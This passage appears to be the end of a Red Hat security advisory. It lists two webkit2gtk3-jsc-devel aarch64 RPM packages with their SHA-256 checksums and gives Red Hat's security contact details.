webkit2gtk3-jsc-devel-2.36.7-1.el8\_7.3.aarch64.rpm

SHA-256: 6a3a7bf139d281323bd487d669756d2f73f353879f67658db1c588fca3175132

webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8\_7.3.aarch64.rpm

SHA-256: 42cfa7b6c067ffbeb61b7e0cbffa3e1c1e460b5d178554030d9b67aa875a49c3

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

Tag

#js